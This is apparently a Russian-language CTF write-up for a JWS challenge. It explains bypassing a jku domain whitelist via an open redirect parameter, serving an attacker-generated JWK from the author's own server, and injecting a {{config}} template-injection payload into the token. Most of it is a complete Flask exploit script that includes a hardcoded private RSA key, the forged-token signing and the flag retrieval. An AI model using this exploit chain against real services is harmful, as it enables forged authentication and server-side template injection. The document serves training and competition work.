JWS writeups

Задание на эксплуатацию jku в jws токене через уязвимость open redirect. Решение имеет примерно такой вид:

В принципе смысл в том, что сервер проверят корректность токена, и отображает payloads, при отображении есть SSTI.

Как и в задании JWT, в токене используется параметр jku, только на этот раз испольльзуется политика белого списка, и разрешен только домен localhost:5001 и 127.0.0.1:5001

Но был порт 5001 был также прокинут и на хосте. Поэтому после перехода на host:5001 мы получает сам файл jwk. (это важно при написании эксплоита)

Далее предполагалось, что вы попытаетесь пробрутфорсить /vuln/* ,и будете искать либо open redirect, либо что-то связанное с html injection/crlf, так как в принципе других вариантов обхода белого списка по домену не много (например попытаться обойти регулярку). Ну тут можно было и без брутфорса, попробовать /redirect

При попытки перейти по /vuln/redirect пулучаем сообщение, что "плохой параметр", что намекает на то, что необходимо пробрутфорсить параметры, которые подходят под open redirect

Параметр был взят из списка
https://github.com/ptswarm/ptswarm-twitter/blob/main/2020-11-30-open-redirect-params.txt

B итоге путь /vuln/redirect?endpoint=

Ну и была идея, закинуть туда ssti. Поэтому задача отправить нагрузку {{config}} в поле payload токена.

Напишем сервер, сгенерируем jwk ключи. В общем exploit будет иметь такой вид

from flask import Flask, request, redirect, jsonify, send_from_directory

from jwcrypto import jwk, jws

from jwcrypto.common import json_encode

import os

import json

import requests, re

app = Flask(__name__)

app.config['pub_key'] = '{"e":"AQAB","kty":"RSA","n":"oBbyWuGxj4wqlVjqcpNh3ZKYTjVXWINNdn8zaJgJdPa0Wt286cE4wExWAV03Kuma7bh8yK5SgY2bte8mdjpcte5T1iOtqWTXDP5XbXQvzLPas1VVvzcMwdsMs4-mkuV6HCYaj7Sbent7Bvx_4aY8qxrIBSuqf4NBP38iE_Bkuzo_OeGtsz0f5KECUPDV-Tum1KDuiwCDt6Jmef_xAWUmAqJv9nK0GLnNceIDXmw775Gi26KxDl7g2ak22pNCEFBKbZqQak4cTeZJfNR-oUZqPXFGO9i2yZJ_G7iN-1JxSPTyqyKnG5Z16d7l1Q_TFP1btPMFu9qS_bdbnkcMxURoBQ"'

app.config['all_key'] = '{"d":"AaOagaGz7rNRsEvDwr6NjvY0RwC2zzow7dipjxWXazIncJK6n24SBa4CZ2sr6G2R34M3C9r1D0yC3p7_NtCsKFSzWQrueUCGDyT_gihhYOgqghGKmjWXFNkITUJYQ0LEOEuPlA8WVG-1N8IYERhhoKLaj2r-COYwIdVMZQXeEiinXLfCVJCEtMMVNBMRfyUoY4_siQ6vMQGxJsHn8XOE2zsMnkreG7kPE-c0UrmsdnhmmyNFtegbS8dej4eH0Xy1txg81wTQSyGUru10QaFYVVAOhRFmdVNvSNWW3uL1guAOgLg8Y17FPnz1FiUGhflTeEsWwcKlVWl7QF0Bel-e1Q","dp":"nAk_O5Qi5HQRhgcsNZsGgFeEeErPn5CoXFx1DhANVbQwuNU-19P29wR4gSaDfexoLLaDXrw50g-ufmCLbz9r461LcPdmD6g9okstgPF38heLhjyTuA84xDu16sCX0ltpxWOWzhRkBeI0uhE1mjXtD7Uk9KUX5Y5SQK6MPZmVsoM","dq":"MznXQhv8h65iqwxzfPj3QwK6s9JvIR4IHnur2t3GYaCd-RG5fGSigkClUeG8TUlxViOr5ElbGsATWOzqAlr_CwTPCwEg9lcL5AKEHOy94k5CfAWMr1csa6Pp6bQJkveDf_c87s2Z1zYn6cJmJZiEJADocRyyUJ_mnh6wpvS7tgs","e":"AQAB","kty":"RSA","n":"oBbyWuGxj4wqlVjqcpNh3ZKYTjVXWINNdn8zaJgJdPa0Wt286cE4wExWAV03Kuma7bh8yK5SgY2bte8mdjpcte5T1iOtqWTXDP5XbXQvzLPas1VVvzcMwdsMs4-mkuV6HCYaj7Sbent7Bvx_4aY8qxrIBSuqf4NBP38iE_Bkuzo_OeGtsz0f5KECUPDV-Tum1KDuiwCDt6Jmef_xAWUmAqJv9nK0GLnNceIDXmw775Gi26KxDl7g2ak22pNCEFBKbZqQak4cTeZJfNR-oUZqPXFGO9i2yZJ_G7iN-1JxSPTyqyKnG5Z16d7l1Q_TFP1btPMFu9qS_bdbnkcMxURoBQ","p":"0-jzleXm-XbQe_gjrKqFsQUypSjtVX2NJ1ckF5op0qE1XiLETHg0C-woMuEymyW-vqRAbgA5yx4pVhlmJTPkv8TVsc9OYsz1H1cswiI-I73uLJ1wgUk_4mapa7K10Mrsw2X9AZpmiP7ntc4OwVdJ7BjUoY587IbZrV0yVCKgeYM","q":"wWXeDP796mxedqUActwBTCQCR3uNjbmOINMZY2CR0DuxCa9AX8V3VZEQVUj1Q6R8o4ixrQywQy1R902Kc9dCQqBkwF4WfybzhkfwiVcf8Yy3bqZzEoGCEbs2KVnYX7J3EBIfgEQVXb_G5ZeOvWzgSTi11e1_kdcUXdANiGtISdc","qi":"MNo8DyDds5N6gw6gmA17Iu0scH5i2n30oS0nDxFp0tKqfd5WAjF7J3P_uESwzW8AvncAm7HtDBd-KEHipcOcm7rPEdfBKKhyo3Q25chBCvRPvVcslmML30p3p0_F26yd5ThHWoo3UmHNoPLiMNZN3oRsCe1w2jity3YVvZDhu48"}'

def generate_key():

   key = jwk.JWK.generate(kty='RSA', size=2048)

   print(key.export_public())

   print(key.export())

@app.route('/') #to get evil jws token

def index():

   jku = 'http://localhost:5001/vuln/redirect?endpoint=http://localhost:5002/hack' #localhost:5002 its own server, 5001 server with vuln open redirect

   payload = '{{config}}'

   key = jws.JWK(**json.loads(app.config['all_key']))

   jwstoken = jws.JWS(payload.encode('utf-8'))

   jwstoken.add_signature(key=key,alg='RS256',protected=None,header=json_encode({"kid": key.thumbprint(), 'jku':jku, "alg":"RS256"}))

   sig = jwstoken.serialize()

   return sig

@app.route('/hack') #to redirect, return evil JWK

def hack(): #need send as file

   with open('tmp.file', 'w') as file_write:

       file_write.write(jwk.JWK(**json.loads(app.config['all_key'])).export_public())

   uploads = os.path.join(os.path.abspath(os.path.dirname(__file__)))

   return send_from_directory(directory='.',filename='tmp.file')

@app.route('/get_flag')

def get_flag():

   payload = index()

   answ = requests.get('http://localhost:5000/jws_check',params={'payloads':payload}).text

   flag = answ

   flag = re.findall('VolgaCTF{.+?}', answ)[-1]

   print(flag)

   return flag

if __name__ == '__main__':

   app.run(port=5002, host='0.0.0.0')

при переходе на /get_flag будет получен флаг